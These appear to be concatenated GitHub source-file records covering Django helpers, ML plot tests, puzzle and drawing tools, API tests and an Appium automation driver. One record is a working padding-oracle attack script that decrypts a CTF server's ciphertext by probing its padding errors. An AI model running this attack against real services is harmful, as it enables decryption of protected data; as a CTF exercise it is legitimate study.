scan_devices()\n\n","repo_name":"bwlee13/ProjectInit","sub_path":"utils/db_utils.py","file_name":"db_utils.py","file_ext":"py","file_size_in_byte":4787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27212945163","text":"from django.conf import settings\nfrom django.core.management import call_command\nfrom django.db.models import loading\nfrom django import test\n\n\nclass TestCase(test.TestCase):\n apps = ('flash.tests',)\n tables_created = False\n\n def 
_pre_setup(self):\n cls = TestCase\n if not cls.tables_created:\n # Add the models to the db.\n cls._original_installed_apps = list(settings.INSTALLED_APPS)\n for app in cls.apps:\n if isinstance(settings.INSTALLED_APPS, tuple):\n settings.INSTALLED_APPS = list(settings.INSTALLED_APPS)\n settings.INSTALLED_APPS.append(app)\n loading.cache.loaded = False\n call_command('syncdb', interactive=False, verbosity=0)\n TestCase.tables_created = True\n\n # Call the original method that does the fixtures etc.\n super(TestCase, self)._pre_setup()\n\n def _post_teardown(self):\n # Call the original method.\n super(TestCase, self)._post_teardown()\n cls = TestCase\n # Restore the settings.\n settings.INSTALLED_APPS = cls._original_installed_apps\n loading.cache.loaded = False\n","repo_name":"HackerEarth/django-flash","sub_path":"flash/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"25407513960","text":"from model import Compra, Cartao, CompraCredito\nfrom datetime import datetime, date\n\nvisa = Cartao('1111 1111 1111 1111', date(2031, 1, 31), '321', 1000.0, 'Steve Rogers')\n\ncompra_farmacia = Compra(100.0, datetime(2023, 1, 1, 10, 0, 0), 'Farmácia Popular', 'Saúde', visa)\ncompra_restaurante = Compra(89.9, datetime(2023, 1, 2, 12, 15, 0), 'Burguer King', 'Lazer', visa)\ncompra_supermercado = Compra(475.5, datetime(2023, 2, 3, 7, 5, 5), 'Carrefour', 'Alimentação', visa)\n\nprint(compra_farmacia)\nprint(compra_restaurante)\nprint(compra_supermercado)\nprint()\n\ncompra_amazon = CompraCredito(1000.0, datetime(2023, 2, 15, 19, 46, 17), 'Amazon', 'Casa', visa, 10)\nprint(f'Compra a crédito: {compra_amazon.valor} em {compra_amazon.quantidade_parcelas}x de {compra_amazon.valor_parcela}')\nprint()\n\nfatura = [compra_farmacia, compra_restaurante, compra_supermercado, compra_amazon]\ntotal = 0\nfor compra in fatura:\n total += compra.valor\n\nprint(f'O total da fatura é: {total}')\n","repo_name":"ThiagoAndrad/levelup-byte-card-python","sub_path":"teste_compra.py","file_name":"teste_compra.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38158767674","text":"import pygame, random\nfrom PIL import Image\n\n\n# функция создания пазлов\ndef create_puzzles(num, width, height):\n rows = num\n cols = num\n num_cells = rows * cols\n\n cell_width = width // rows\n cell_height = height // cols\n\n cells = []\n rand_indexes = list(range(0, num_cells))\n\n for i in range(num_cells):\n x = (i % rows) * cell_width\n y = (i // cols) * cell_height\n rect = pygame.Rect(x, y, cell_width, cell_height)\n rand_pos = random.choice(rand_indexes)\n rand_indexes.remove(rand_pos)\n cells.append({'rect': rect, 'border': (255, 255, 255), 'order': i, 'pos': rand_pos})\n return [cells, cell_width, cell_height]\n\n\n# функция создания фона для финального экрана\ndef converting(image):\n im_final = image.convert(\"L\")\n im_final.save('final.jpg')\n bg_final = pygame.image.load('final.jpg')\n return bg_final\n\n\n# функция изменения громкости\ndef change_volume(flag, volume):\n if flag:\n if 0 <= volume < 10:\n volume += 1\n pygame.mixer.music.set_volume(0.1 * volume)\n return volume\n elif volume == 10:\n return volume\n else:\n if 0 < volume <= 10:\n volume -= 1\n pygame.mixer.music.set_volume(0.1 * volume)\n return volume\n elif volume == 0:\n return 
volume\n","repo_name":"Scut1er/Ultimate-puzzle","sub_path":"defs.py","file_name":"defs.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31791274117","text":"import numpy as np\nimport pytest\nfrom matplotlib import pyplot as plt\nfrom matplotlib.axes import Axes\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.preprocessing import label_binarize\nfrom sklearn.svm import SVC\n\nfrom ml_tooling import Model\nfrom ml_tooling.data import load_demo_dataset\nfrom ml_tooling.result import Result\nfrom ml_tooling.utils import VizError\n\n\nclass TestPRCurve:\n @pytest.fixture(scope=\"class\")\n def classifier_result(self) -> Result:\n \"\"\"Setup a classiifer Result\"\"\"\n dataset = load_demo_dataset(\"iris\")\n model = Model(LogisticRegression())\n return model.score_estimator(dataset)\n\n @pytest.fixture(scope=\"class\")\n def ax(self, classifier_result: Result) -> Axes:\n \"\"\"Setup a PR Curve plot\"\"\"\n yield classifier_result.plot.precision_recall_curve()\n plt.close()\n\n def test_plots_can_be_given_an_ax(self, classifier_result: Result):\n \"\"\"Expect a plot to be able to be passed an existing axis and plot on that\"\"\"\n fig, ax = plt.subplots()\n test_ax = classifier_result.plot.precision_recall_curve(ax=ax)\n assert ax == test_ax\n plt.close()\n\n def test_has_the_correct_title(self, ax: Axes):\n \"\"\"Expect the title to reflect the estimator used\"\"\"\n assert ax.title.get_text() == \"Precision-Recall - LogisticRegression\"\n\n def test_has_the_correct_ylabel(self, ax: Axes):\n \"\"\"Expect the plot to have the correct y label\"\"\"\n assert ax.get_ylabel() == \"Precision\"\n\n def test_has_the_correct_xlabel(self, ax: Axes):\n \"\"\"Expect the plot to have the correct x label\"\"\"\n assert ax.get_xlabel() == \"Recall\"\n\n @pytest.mark.parametrize(\"class_index\", [0, 1, 2])\n def test_pr_curve_have_correct_data(\n self, ax: Axes, classifier_result: Result, class_index\n ):\n \"\"\"Expect the pr curve to have the correct data\"\"\"\n x = classifier_result.plot._data.test_x\n y_true = label_binarize(classifier_result.plot._data.test_y, classes=[0, 1, 2])[\n :, class_index\n ]\n y_proba = classifier_result.estimator.predict_proba(x)[:, class_index]\n\n precision, recall, _ = precision_recall_curve(y_true, y_proba)\n\n assert np.all(recall == ax.lines[class_index].get_xdata())\n assert np.all(precision == ax.lines[class_index].get_ydata())\n plt.close()\n\n def test_pr_curve_fails_correctly_without_predict_proba(self):\n \"\"\"\n Expect that the plot will raise an exception if the estimator\n does not have a predict_proba method\n \"\"\"\n dataset = load_demo_dataset(\"iris\")\n svc = Model(SVC(gamma=\"scale\"))\n result = svc.score_estimator(dataset)\n with pytest.raises(VizError):\n result.plot.precision_recall_curve()\n plt.close()\n\n def test_fails_if_wrong_number_of_labels_passed(self, classifier_result: Result):\n \"\"\"\n Expect the plot to raise if a different number of labels are passed, than there are\n classes in the data\n \"\"\"\n with pytest.raises(VizError):\n 
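# (editor's note, added) the demo iris dataset has three classes, so passing a single\n            # label here is expected to be rejected by the plot with a VizError.\n            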
classifier_result.plot.precision_recall_curve(labels=[\"one\"])\n","repo_name":"andersbogsnes/ml_tooling","sub_path":"tests/test_visualizations/test_precision_recall_curve.py","file_name":"test_precision_recall_curve.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"17763583101","text":"import socket\nimport time\n\nhost = \"192.168.2.83\"\n\nport = 26151\n\ninvalid = 'invalid padding\\n'\n\ndata = \"5468697320697320616e204956343536069242ad5ac3e289582b09ff2d30032b0e72a2004dc6d37181448f0327a2a3f3fe3280b99951c832ca8d08940716d226af1a2edddadfdbe92a5933f4d869c714e53842a369eb89a44ae1159b3b73f3d3\" ## the cipher we want to decrypt, copy from CTF server terminal\n\n\nblock1 = data[0:32]\nblock2 = data[32:64]\nblock3 = data[64:96]\nblock4 = data[96:128]\nblock5 = data[128:160]\nblock6 = data[160:192]\n\ndef attack_blocks(block1, block2):\n c1 = block1\n c2 = block2\n res = b\"\"\n index = 30\n plain_padding = 1\n Is = []\n for _ in range(16):\n time.sleep(5)\n paddings = [hex(plain_padding ^ I)[2:] for I in Is]\n padding_str = \"\"\n\n for I in Is:\n p = hex(plain_padding ^ I)[2:]\n if len(p) == 1:\n p = '0' + p\n padding_str += p\n\n for i in range(256):\n b = hex(i)[2:]\n if len(b) == 1:\n b = \"0\" + b\n\n c1_ = c1[ : index] + b + padding_str\n print(\"current cipher: \", c1_)\n secret_text = c1_ + c2 + \" \"\n\n s = socket.socket()\n s.connect((host, port))\n s.sendall(secret_text.encode())\n s.shutdown(socket.SHUT_WR)\n\n fragments = []\n while True:\n chunk = s.recv(100)\n if not chunk:\n break\n fragments.append(chunk.decode('utf-8'))\n result = \"\".join(fragments)\n \n s.close()\n\n if result[-16:] != invalid:\n if b == c1[index : index + 2] and plain_padding == 1:\n continue\n I = int(b, 16) ^ plain_padding ##\n Is = [I] + Is\n plain = hex(int(c1[index:index + 2], 16) ^ I)[2:] ##\n if len(plain) == 1:\n plain = '0' + plain\n bytes_obj = bytes.fromhex(plain)\n res = bytes_obj + res\n plain_padding += 1\n index -= 2\n break\n print(\"current block has message: \", res)\n return res\n\n\n\nplain_5 = attack_blocks(block5, block6)\ntime.sleep(5)\nplain_4 = attack_blocks(block4, block5)\ntime.sleep(5)\nplain_3 = attack_blocks(block3, block4)\ntime.sleep(5)\nplain_2 = attack_blocks(block2, block3)\ntime.sleep(5)\nplain_1 = attack_blocks(block1, block2)\n\nprint(\"The plain text is \", plain_1 + plain_2 + plain_3 + plain_4 + plain_5)\n","repo_name":"biankaiwen111/padding_oracles","sub_path":"decrypt.py","file_name":"decrypt.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18229130641","text":"from typing import List\nimport itertools\n\n\nclass Solution:\n def letterCombinations(self, digits: str) -> List[str]:\n\n if not digits:\n return None\n\n phone = {'2': ['a', 'b', 'c'],\n '3': ['d', 'e', 'f'],\n '4': ['g', 'h', 'i'],\n '5': ['j', 'k', 'l'],\n '6': ['m', 'n', 'o'],\n '7': ['p', 'q', 'r', 's'],\n '8': ['t', 'u', 'v'],\n '9': ['w', 'x', 'y', 'z']}\n\n\n def divideAndConquer(number):\n\n count_of_digits = len(number)\n\n mid = int(count_of_digits/2)\n\n if mid == 0:\n return phone.get(number[0])\n\n list1 = divideAndConquer(number[0:mid])\n list2 = divideAndConquer(number[mid:])\n\n combo = [''.join(tuple) for tuple in (list(itertools.product(list1,list2)))]\n return combo\n\n return divideAndConquer(digits)\n\n\ndigits = '243'\ns = 
Solution()\nprint(s.letterCombinations(digits))\n","repo_name":"jayati-naik/Leetcode-Recursion-II","sub_path":"LetterCombinationsD&C.py","file_name":"LetterCombinationsD&C.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13105584486","text":"from django.conf import settings\nfrom django.shortcuts import render\n\nfrom .forms import RegModelForm, ContactForm\nfrom .models import Registrado\n\n# Create your views here.\ndef home(request):\n titulo = \"Welcome!\"\n if request.user.is_authenticated:\n titulo = \"Welcome %s\" %(request.user)\n form = RegModelForm(request.POST or None)\n \n context = {\n \"titulo\": titulo,\n \"form\": form,\n }\n \n if form.is_valid():\n instance = form.save(commit=False)\n nombre = form.cleaned_data.get(\"nombre\")\n email = form.cleaned_data.get(\"email\")\n if not instance.nombre:\n instance.nombre = \"PERSONA\"\n instance.save()\n \n context = {\n \"titulo\": \"Gracias %s!\" %(nombre)\n }\n\n if not nombre:\n context = {\n \"titulo\": \"Gracias %s!\" %(email)\n }\n\n print (instance)\n print (instance.timestamp)\n\n if request.user.is_authenticated and request.user.is_staff:\n queryset = Registrado.objects.all().order_by('-timestamp') \n context = {\n \"queryset\": queryset,\n }\n return render(request, \"home.html\", context)\n\ndef contact(request):\n titulo = \"Contacto\"\n form = ContactForm(request.POST or None)\n if form.is_valid():\n for key in form.cleaned_data:\n print (key)\n print (form.cleaned_data.get(key))\n\n context = {\n \"form\": form,\n \"titulo\": \"Contacto\",\n }\n return render(request, \"forms.html\", context)","repo_name":"lnpereyra/djangofirstapp","sub_path":"src/boletin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13141286226","text":"from django.db import models\n\n# Create your models here.\n\nclass Author(models.Model):\n name = models.CharField('Имя автора', max_length= 250)\n surname = models.CharField('Фамилия автора', max_length=250)\n\n def __str__(self):\n return self.name\n\nclass Book(models.Model):\n author = models.ForeignKey(Author)\n book_name = models.CharField('Название книги', max_length=250)\n release_date = models.DateField('Дата выпуска', )\n\n def __str__(self):\n return self.book_name\n\nclass Comment(models.Model):\n comments_link_user = models.ForeignKey('User')\n comments_link_author = models.ForeignKey(Author, blank= True,null=True)\n comments_link_book = models.ForeignKey(Book, blank=True, null=True)\n comment_text = models.TextField('текст комментария', max_length=250)\n\nclass User (models.Model):\n name = models.CharField('Имя автора', max_length=250)\n surname = models.CharField('фамилия автора', max_length=250)\n\n\n","repo_name":"sergeyrudov/library","sub_path":"Books/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20814575783","text":"from app.domain import List, Item\nfrom app.infrastructure.repositories import ListRepository\nfrom app.error import Error\nfrom result import Ok, Result\n\n\nclass List:\n def __init__(self):\n self.list_repository = ListRepository()\n\n def find(self, list_id: str) -> Result[List, Error]:\n list_result = self.list_repository.find_by_id(list_id)\n return list_result\n\n def 
create_item(\n self,\n text: str,\n list_id: str,\n ) -> Result[Item, Error]:\n # find the existing list\n list_result = self.list_repository.find_by_id(list_id)\n\n # if list was not found, return error\n if list_result.is_err():\n return list_result\n\n # pull out the list domain object\n list = list_result.ok()\n\n # create the new item\n item = Item(text=text)\n\n # add the item to the list\n list.add_item(item)\n\n # save the aggregate\n save_result = self.list_repository.save(list)\n\n if save_result.is_err():\n return save_result\n\n return Ok(item)\n","repo_name":"MathyouMB/django-ddd-service-template","sub_path":"app/application/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"13128376856","text":"import tkinter as tk\r\nfrom PIL import Image, ImageTk, EpsImagePlugin\r\nimport pyautogui\r\nfrom app.cv import processing\r\n\r\nclass Drawing(tk.Tk):\r\n def __init__(self):\r\n tk.Tk.__init__(self)\r\n self.x = self.y = 0\r\n self.canvas = tk.Canvas(self, width=1920, height=1080, cursor=\"cross\")\r\n self.canvas.pack(side=\"top\", fill=\"both\", expand=True)\r\n self.canvas.bind(\"\", self.on_button_press)\r\n self.canvas.bind(\"\", self.on_button3_press)\r\n self.canvas.bind(\"\", self.on_move)\r\n\r\n self.line = None\r\n\r\n self.start_x = None\r\n self.start_y = None\r\n\r\n self.old_x = None\r\n self.old_y = None\r\n\r\n self.first_x = None\r\n self.first_y = None\r\n\r\n self._draw_image()\r\n\r\n def _draw_image(self):\r\n self.im = Image.open('screenshot.jpg')\r\n self.tk_im = ImageTk.PhotoImage(self.im)\r\n self.canvas.create_image(0, 0, anchor=\"nw\", image=self.tk_im)\r\n\r\n def on_button_press(self, event):\r\n self.old_x = self.start_x\r\n self.old_y = self.start_y\r\n self.start_x = event.x\r\n self.start_y = event.y\r\n if self.old_x is not None:\r\n if abs(event.x - self.first_x) <= 10 and abs(event.y - self.first_y) <= 10:\r\n self.canvas.create_line(self.old_x, self.old_y, self.first_x, self.first_y, fill='red', tag=\"lines\")\r\n self.line = None\r\n self.start_x = None\r\n self.start_y = None\r\n self.old_x = None\r\n self.old_y = None\r\n self.first_x = None\r\n self.first_y = None\r\n img = Image.open('screenshot.jpg')\r\n EpsImagePlugin.gs_windows_binary = r'C:\\Program Files\\gs\\gs9.56.1\\bin\\gswin64c'\r\n self.canvas.postscript(file='polygon' + '.eps')\r\n img = Image.open('polygon' + '.eps')\r\n img.save('polygon' + '.png', 'png')\r\n img = Image.open('polygon' + '.png')\r\n processing(img)\r\n else:\r\n self.canvas.create_line(self.old_x, self.old_y, event.x, event.y, fill='red', tag=\"lines\")\r\n\r\n else:\r\n self.first_x = self.start_x\r\n self.first_y = self.start_y\r\n\r\n if not self.line:\r\n self.line = self.canvas.create_line(self.start_x, self.start_y, event.x, event.y, fill='red', tag=\"lines\")\r\n\r\n def on_move(self, event):\r\n curX, curY = (event.x, event.y)\r\n\r\n # expand rectangle as you drag the mouse\r\n if self.start_x is not None:\r\n self.canvas.coords(self.line, self.start_x, self.start_y, curX, curY)\r\n\r\n def on_button3_press(self, event):\r\n self.canvas.delete('lines')\r\n self.line = None\r\n self.start_x = None\r\n self.start_y = None\r\n self.old_x = None\r\n self.old_y = None\r\n self.first_x = None\r\n self.first_y = None\r\n\r\n\r\ndef main():\r\n pyautogui.screenshot('screenshot.jpg', region=(0, 0, 1920, 1080))\r\n draw = Drawing()\r\n 
draw.mainloop()\r\n","repo_name":"NovakWilson/projectt","sub_path":"drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14868206940","text":"import pytest\nfrom api import Restful\n\nhost = 'http://localhost:32768'\n\n\ndef create_new(type_b, name, age):\n parametrs = [type_b, name.upper(), age]\n list_r = ['None', 'None', 'None', 'None']\n\n # format param\n param_dict = Parametrs_bear().param(type_b, name, age)\n\n # create new\n res = Restful(host).create_new_bear(param_dict)\n res_stat = res.status_code\n\n list_r[3] = str(res_stat)\n if res_stat != 500:\n created_id = int(res.content)\n print('id new objeckt: ', created_id,'the collected parameters: ', param_dict, \\\n 'status_code: ',res_stat)\n\n # check type created obj\n res = Restful(host).read_bear(created_id)\n l_p = [\"bear_type\", \"bear_name\", \"bear_age\"]\n for i in range(3):\n if res.json() != None:\n par = res.json()[l_p[i]]\n else:\n par = 'None'\n list_r[i] = par\n print('parametr_ecxpect: ', parametrs[i], ' << == >> parametr_fuct:', par)\n\n print('parametrs fron testing objekt :',list_r)\n return list_r\n\n\ndef create_one():\n param_dict = Parametrs_bear().param('POLAR', 'mihail', 17.5)\n # create new\n res = Restful(host).create_new_bear(param_dict)\n return int(res.content)\n\n\ndef update(type_b, name, age, created_id):\n parametrs = [type_b, name.upper(), age]\n list_r = ['None', 'None', 'None', 'None']\n\n # format param\n param_dict = Parametrs_bear().param(type_b, name, age)\n\n # update param\n res = Restful(host).update_bear(created_id, param_dict)\n list_r[3] = str(res.status_code)\n\n # check update\n res = Restful(host).read_bear(created_id)\n l_p = [\"bear_type\", \"bear_name\", \"bear_age\"]\n for i in range(3):\n if res.json() != None:\n par = res.json()[l_p[i]]\n else:\n par = 'None'\n list_r[i] = par\n print('parametr_ecxpect: ', parametrs[i], ' << == >> parametr_fuct:', par)\n\n print('parametrs fron testing objekt :', list_r)\n return list_r\n\n\ndef test_dellete_one():\n param = Parametrs_bear().param('POLAR', 'mihail', 17.5)\n # create new\n res = Restful(host).create_new_bear(param)\n created_id = int(res.content)\n print('created_id :', created_id, ' ', param, ' ', res.status_code)\n # dell by id\n Restful(host).dell_bear(created_id)\n # check odj by id dellete\n res = Restful(host).read_bear(created_id)\n assert res.content == b'EMPTY'\n\n\nclass Parametrs_bear:\n def param(self, type_b, name, age):\n param_dict = {\"bear_type\": type_b, \"bear_name\": name, \"bear_age\": age}\n return param_dict\n\n\n@pytest.mark.parametrize(\"type_b , name, age, res\",\n [\n ('POLAR', 'mihail', 17.5, '200'),\n ('BROWN', 'mihail', 17.5, '200'),\n ('BLACK', 'mihail', 17.5, '200'),\n ('GUMMY', 'mihail', 17.5, '200'),\n ('', 'mihail', 17.5, '500'),\n ('BROWN', '', 17.5, '500'),\n ('BLACK', 'mihail', '', '500'),\n ('BLACK', 'mihail', 0, '200'),\n ('black', 'mihail', 10, '500'),\n ('white', 'mihail', 10, '500'),\n (0, 'mihail', 10, '500'),\n ('BLACK', 'm' * 100, 10, '200'),\n ('BLACK', 'm' * 1000, 10, '200'),\n ('BLACK', 'mihail', -0.1, '200'),\n ('BLACK', 'mihail', 200, '500'),\n\n ]\n )\ndef test_create(type_b, name, age, res):\n l_res = create_new(type_b, name, age)\n n_res = l_res[3]\n if age != '' and age < 0:\n age = 0\n\n assert res in n_res\n if n_res != '500':\n assert type_b in l_res[0]\n assert name.upper() in l_res[1]\n assert age == 
l_res[2]\n\n\n@pytest.mark.parametrize(\"type_b , name, age, res\",\n [\n ('BROWN', 'mihail', 17.5, '200'),\n ('POLAR', 'Change_Name', 17.5, '200'),\n ('POLAR', 'mihail', 10, '200'),\n ]\n )\ndef test_update(type_b, name, age, res):\n l_res = update(type_b, name, age, create_one())\n n_res = l_res[3]\n\n assert res in n_res\n if n_res != '500':\n assert type_b in l_res[0]\n assert name in l_res[1]\n assert age == l_res[2]\n\n\ndef test_dellete_all():\n # clear base\n Restful(host).dell_all_bear()\n # check base == []\n res = Restful(host).read_all_bears().json()\n assert res == []\n","repo_name":"Polenichko/Alaska_bears","sub_path":"tests_script.py","file_name":"tests_script.py","file_ext":"py","file_size_in_byte":4712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23775447961","text":"import kubernetes\n\n\nif __name__ == \"__main__\":\n kubernetes.config.load_kube_config()\n api = kubernetes.client.CoreV1Api()\n # a = api.read_namespace('default')\n # print(a.metadata.name)\n custom_obj_api = kubernetes.client.CustomObjectsApi()\n\n tenants = custom_obj_api.list_cluster_custom_object('ip.demo.com', 'v1', 'tenants')\n print(tenants['items'])\n # old = ['user1@demo.com', 'user2@demo.com']\n # new = ['user1@demo.com', 'user3@demo.com']\n\n # print(f\"new: {set(new) - set(old)}\")\n \n # print(f\"removed: {set(old) - set(new)}\")","repo_name":"JasperJiang/KubernetesCRDPlay","sub_path":"kubectl.py","file_name":"kubectl.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6069553232","text":"from selenium import webdriver\nfrom selenium.common.exceptions import ElementClickInterceptedException\nfrom appium.webdriver.common.touch_action import TouchAction\nfrom time import sleep\nimport re\n\nfrom sweet import log, vars\nfrom sweet.utility import compare, replace, json2dict\n\nfrom sweet.modules.mobile.window import Windows\nfrom sweet.modules.web.locator import locating\nfrom sweet.modules.web.config import *\n\n\nclass App:\n\n keywords = keywords\n\n def __init__(self, setting):\n self.action = {}\n platform = setting.get('platformName', '')\n # snapshot = setting.pop('snapshot', False)\n\n if platform.lower() == 'ios':\n from appium import webdriver as appdriver\n self.driver = appdriver.Remote(self.server_url, self.desired_caps)\n\n elif platform.lower() == 'android':\n from appium import webdriver as appdriver\n self.driver = appdriver.Remote(self.server_url, self.desired_caps)\n\n # 等待元素超时时间\n self.driver.implicitly_wait(element_wait_timeout) # seconds\n # 页面刷新超时时间\n self.driver.set_page_load_timeout(page_flash_timeout) # seconds\n self.w = Windows()\n self.w.driver = self.driver\n\n def _close(self):\n pass\n\n def _call(self, step):\n # 处理截图数据\n # snap = Snapshot()\n # snap.pre(step)\n\n context = replace(step.get('frame', '')).strip()\n self.w.switch_context(context)\n\n if self.w.current_context.startswith('WEBVIEW'):\n # 切换标签页\n tab = step['data'].get('#tab')\n if tab:\n del step['data']['#tab']\n self.driver.switch_to_window(self.w.windows[tab])\n log.debug(f'current context: {repr(self.w.current_context)}')\n\n # 根据关键字调用关键字实现\n element = getattr(self, step['keyword'].lower())(step)\n # snap.web_shot(step, element)\n\n\n def title(self, data, output):\n log.debug(f'DATA:{repr(data[\"text\"])}')\n log.debug(f'REAL:{repr(self.driver.title)}')\n\n if data['text'].startswith('*'):\n assert data['text'][1:] in 
self.driver.title\n else:\n assert data['text'] == self.driver.title\n # 只能获取到元素标题\n for key in output:\n vars.put({key: self.driver.title})\n\n\n def current_url(self, data, output):\n log.debug(f'DATA:{repr(data[\"text\"])}')\n log.debug(f'REAL:{repr(self.driver.current_url)}')\n try:\n if data['text'].startswith('*'):\n assert data['text'][1:] in self.driver.current_url\n else:\n assert data['text'] == self.driver.current_url\n except:\n raise Exception(\n f'check failure, DATA:{data[\"text\"]}, REAL:{self.driver.current_url}')\n # 只能获取到元素 url\n for key in output:\n vars.put({key: self.driver.current_url})\n return self.driver.current_url\n\n def locat(self, element, action=''):\n if not isinstance(element, dict):\n raise Exception(f'no this element:{element}')\n\n\n def open(self, step):\n url = step['element']['value']\n\n if step['data'].get('#clear', ''):\n self.driver.delete_all_cookies()\n\n self.driver.get(url)\n\n cookie = step['data'].get('cookie', '')\n if cookie:\n self.driver.add_cookie(json2dict(cookie))\n co = self.driver.get_cookie(json2dict(cookie).get('name', ''))\n log.debug(f'cookie is add: {co}')\n sleep(0.5)\n\n\n def check(self, step):\n data = step['data']\n if not data:\n data = step['expected']\n\n element = step['element']\n by = element['by']\n output = step['output']\n\n if by in ('title', 'current_url'):\n getattr(self, by)(data, output)\n else:\n location = self.locat(element)\n for key in data:\n # 预期结果\n expected = data[key]\n # 切片操作处理\n s = re.findall(r'\\[.*?\\]', key)\n if s:\n s = s[0]\n key = key.replace(s, '')\n\n if key == 'text':\n real = location.text\n else:\n real = location.get_attribute(key)\n if s:\n real = eval('real' + s)\n\n log.debug(f'DATA:{repr(expected)}')\n log.debug(f'REAL:{repr(real)}')\n try:\n compare(expected, real)\n except:\n raise Exception(\n f'check failure, DATA:{repr(expected)}, REAL:{repr(real)}')\n\n # 获取元素其他属性\n for key in output:\n if output[key] == 'text':\n v = location.text\n vars.put({key: v})\n elif output[key] in ('text…', 'text...'):\n if location.text.endswith('...'):\n v = location.text[:-3]\n vars.put({key: v})\n else:\n v = location.text\n vars.put({key: v})\n else:\n v = location.get_attribute(output[key])\n vars.put({key: v})\n\n\n def notcheck(self, step):\n try:\n self.check(step)\n raise Exception('check is success')\n except:\n pass\n\n def input(self, step):\n data = step['data']\n location = self.locat(step['element'])\n\n if step['data'].get('清除文本', '') == '否' or step['data'].get('clear', '').lower() == 'no':\n pass\n else:\n location.clear()\n\n for key in data:\n if key.startswith('text'):\n if isinstance(data[key], tuple):\n location.send_keys(*data[key])\n elif location:\n location.send_keys(data[key])\n sleep(0.5)\n if key == 'word': # 逐字输入\n for d in data[key]:\n location.send_keys(d)\n sleep(0.3)\n\n def set_value(self, step):\n data = step['data']\n location = self.locat(step['element'])\n if step['data'].get('清除文本', '') == '否' or step['data'].get('clear', '').lower() == 'no':\n pass\n else:\n location.clear()\n\n for key in data:\n if key.startswith('text'):\n if isinstance(data[key], tuple):\n location.set_value(*data[key])\n elif location:\n location.set_value(data[key])\n sleep(0.5)\n if key == 'word': # 逐字输入\n for d in data[key]:\n location.set_value(d)\n sleep(0.3)\n\n def click(self, step):\n elements = step['elements'] # click 支持多个元素连续操作,需要转换为 list\n # data = step['data']\n\n location = ''\n for element in elements:\n location = self.locat(element, 'CLICK')\n sleep(0.5)\n try:\n 
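# (editor's note, added) first click attempt; if another element intercepts the click,\n                # the except branch below waits one second and retries once.\n                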
location.click()\n except ElementClickInterceptedException: # 如果元素为不可点击状态,则等待1秒,再重试一次\n sleep(1)\n location.click()\n sleep(0.5)\n\n # 获取元素其他属性\n output = step['output']\n for key in output:\n if output[key] == 'text':\n vars.put({key: location.text})\n elif output[key] == 'tag_name':\n vars.put({key: location.tag_name})\n elif output[key] in ('text…', 'text...'):\n if location.text.endswith('...'):\n vars.put({key: location.text[:-3]})\n else:\n vars.put({key: location.text})\n else:\n vars.put({key: location.get_attribute(output[key])})\n\n def tap(self, step):\n action = TouchAction(self.driver)\n\n elements = step['elements'] # click 支持多个元素连续操作,需要转换为 list\n # data = step['data']\n\n location = ''\n\n for element in elements:\n if ',' in element:\n position = element.split(',')\n x = int(position[0])\n y = int(position[1])\n position = (x, y)\n self.driver.tap([position])\n sleep(0.5)\n else:\n location = self.locat(element, 'CLICK')\n action.tap(location).perform()\n sleep(0.5)\n\n # 获取元素其他属性\n output = step['output']\n for key in output:\n if output[key] == 'text':\n vars.put({key: location.text})\n elif output[key] == 'tag_name':\n vars.put({key: location.tag_name}) \n elif output[key] in ('text…', 'text...'):\n if location.text.endswith('...'):\n vars.put({key: location.text[:-3]})\n else:\n vars.put({key: location.text})\n else:\n vars.put({key: location.get_attribute(output[key])})\n\n def press_keycode(self, step):\n element = step['element']\n self.driver.press_keycode(int(element))\n\n def swipe(self, step):\n elements = step['elements']\n duration = step['data'].get('持续时间', 0.3)\n assert isinstance(elements, list) and len(\n elements) == 2, '坐标格式或数量不对,正确格式如:100,200|300,400'\n\n start = elements[0].replace(',', ',').split(',')\n start_x = int(start[0])\n start_y = int(start[1])\n\n end = elements[1].replace(',', ',').split(',')\n end_x = int(end[0])\n end_y = int(end[1])\n\n if duration:\n self.driver.swipe(start_x, start_y, end_x,\n end_y, sleep(float(duration)))\n else:\n self.driver.swipe(start_x, start_y, end_x, end_y)\n\n def line(self, step):\n elements = step['elements']\n duration = float(step['data'].get('持续时间', 0.3))\n assert isinstance(elements, list) and len(\n elements) > 1, '坐标格式或数量不对,正确格式如:258,756|540,1032'\n postions = []\n for element in elements:\n element = element.replace(',', ',')\n p = element.split(',')\n postions.append(p)\n\n action = TouchAction(self.driver)\n action = action.press(\n x=postions[0][0], y=postions[0][1]).wait(duration * 1000)\n for i in range(1, len(postions)):\n action.move_to(x=postions[i][0], y=postions[i]\n [1]).wait(duration * 1000)\n action.release().perform()\n\n def line_unlock(self, step):\n elements = step['elements']\n duration = 